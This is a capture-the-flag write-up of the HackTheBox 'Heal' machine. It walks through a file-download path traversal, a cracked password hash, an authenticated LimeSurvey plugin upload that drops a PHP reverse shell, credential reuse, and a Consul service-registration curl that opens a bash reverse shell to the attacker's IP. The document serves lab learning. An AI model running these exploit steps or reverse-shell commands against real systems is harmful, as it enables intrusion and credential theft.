HTB - Heal

Enumeration

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $nmap -p22,80 -sCV $ip -oN Nmap/script-scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_  256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://heal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

Summary

* Open ports: 22 - 80
* UDP open ports: None
* Services: SSH - HTTP
* Important notes: OpenSSH 8.9p1 - nginx 1.18.0 - http://heal.htb/

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $sudo sh -c "echo  '$ip heal.htb' >> /etc/hosts"

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $tail -n1 /etc/hosts
10.10.11.46 heal.htb

HTTP

http://heal.htb looks like this:

First, I will collect all subdomains from active enumeration (fuzzing)

Next, I fuzz for files and directories under, but don't get anything, So I switch to crawling the app for URLs and endpoints

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $katana -u http://heal.htb -jc -o heal.endpoints

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $cat heal.endpoints | grep api.heal.htb

http://api.heal.htb/download?filename=
http://api.heal.htb/exports
http://api.heal.htb/resume
http://api.heal.htb/logout
http://api.heal.htb/profile
http://api.heal.htb/signin
http://api.heal.htb/signup

So, from these endpoints I can see heal.htb that it uses the API at api.heal.htb to do several functions (sign-up, exports, sign-in, resume)

From whatweb, I can know ruby on rails technology being used in api.heal.htb

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/UnderPass]
└──╼ $ whatweb http://api.heal.htb

http://api.heal.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.46], Title[Ruby on Rails 7.1.4], UncommonHeaders[x-content-type-options,x-permitted-cross-domain-policies,referrer-policy,x-request-id], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[0], nginx[1.18.0]

Now, I will interact with the app to see its functionalities

Create an email to sign in with

After clicking on sign-up, I get to this

At the bottom of the page, there is an export pdf function

Intercepting the request with burp, I see it renders input field and returns the file name of pdf

Then it requests to download the file to a different endpoint

GET /download?filename=12b85d49e4b595b93ed4.pdf HTTP/1.1
Host: api.heal.htb
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.CZbGMyPLgTWm9p2lPa9pGZ0vGQ0qKgr7RG4kj1tUSGc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Origin: http://heal.htb
Referer: http://heal.htb/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

So, I thought about trying to download a local file such as /etc/passwd , and succeeds :))

These are the users having /bin/bash shell

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $cat passwd | grep '/bin/bash' 

root:x:0:0:root:/root:/bin/bash
ralph:x:1000:1000:ralph:/home/ralph:/bin/bash
postgres:x:116:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ron:x:1001:1001:,,,:/home/ron:/bin/bash

Since, ruby is used in api.heal.htb, it's worth nothing to try to include config.ru as it's commonly used by ruby on rails

It gives us good path to start with: config/ and from this post, we can know the credentials file being used by ruby

Configuring and connecting to a database - Learn Ruby on Rails | BigBinary Academycourses.bigbinaryacademy.com

In config/database.yml, I get the location of sqlite3 database, since it uses ruby

Looking at it, there are some secrets

Cracking with hashcat

hashcat -m 3200 '$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG' /usr/share/wordlist/rockyou.txt

..snip..
$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG:147258369

Session..........: hashcat
Status...........: Cracked

Foothold

Under survey, there is a button that redirects to a new subdomain take-survery

I added this to my file and continued. Going to http://take-survey.heal.htb, I see this page with info that ralph@heal.htb is the administrator

There is an admin panel under /admin that needs credentials, So I will leave it now.

Going to Survey admin panel, I used the credentials to login as ralph from the email we saw before.

After login, I note the app version below 6.6.4

When I searched for this version, I found RCE POC

GitHub - Y1LD1R1M-1337/Limesurvey-RCE: LimeSurvey Authenticated RCEGitHub

Download the exploit, modify the reverse shell with my IP and port, and modify and config.yml by adding compatibility version 6 as it's not there by default.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.git

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $ cat php-rev.php 

..snip..
$ip = '10.10.16.2';
$port = 1337;
..snip..

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $cat config.xml 

..snip..
    <compatibility>
        <version>3.0</version>
        <version>4.0</version>
        <version>5.0</version>
        <version>6.0</version>

I did exploitation steps manually instead of running exploit.py

Upload the zip file and click install

Activate the module.

Receive a shell as www-data after navigating to http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-rev.php

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $sudo /opt/penelope/penelope.py -i tun0 1337

[+] Got reverse shell from 🐧 heal.htb~10.10.11.46 💀 - Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/heal.htb~10.10.11.46/heal.htb~10.10.11.46.log 📜
www-data@heal:/$

Lateral Movement

www-data@heal:/var$ netstat -antp | grep 127.0.0.1 | grep -i LISTEN

tcp        0      0 127.0.0.1:3001          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8600          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8503          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8500          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8302          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8301          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8300          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -

On running linpeas.sh, I got interesting credentials from the config file. It's a credential for PostgreSQL instance.

www-data@heal:/tmp$ nano /var/www/limesurvey/application/config/config.php

..snip..
return array(
        'components' => array(
                'db' => array(
                        'connectionString' => 'pgsql:host=localhost;port=5432;user=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey;',
                        'emulatePrepare' => true,
                        'username' => 'db_user',
                        'password' => 'AdmiDi0_XXXXXXX',
                        'charset' => 'utf8',
                        'tablePrefix' => 'lime_',

I tried the password for two users, It only worked for ron

www-data@heal:/tmp$ su ron
Password: AdmiDi0_XXXXXXX
ron@heal:/tmp$  

ron@heal:~$ cat user.txt 
 6532d7ea0abd75ce47e3exxxxxxxxxxx

User Flag: 6532d7ea0abd75ce47e3exxxxxxxxxxx

Privilege Escalation

From the open ports inside the box, I will map them to my host to be able to attack it using port forwarding over SSH

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $sshpass -p 'AdmiDi0_XXXXXXX' ssh ron@heal.htb -L 8500:127.0.0.1:8500

http://localhost:8500/ui/server1/services

The version in the left corner is Consul v1.19.2. Looking for public exploit to this version, I found this https://www.exploit-db.com/exploits/51117

From this POC, I construct my command to do it manually and receive a shell

curl -X PUT -d '{"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.16.2/8443 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}' http://127.0.0.1:8500/v1/agent/service/register

root@heal:~# cat root.txt 
70fa8cc16d180a0981f8xxxxxxxxxx

Root Flag: 70fa8cc16d180a0981f8xxxxxxxxxx

PreviousHTB - WifineticTwo NextHard

Last updated 11 months ago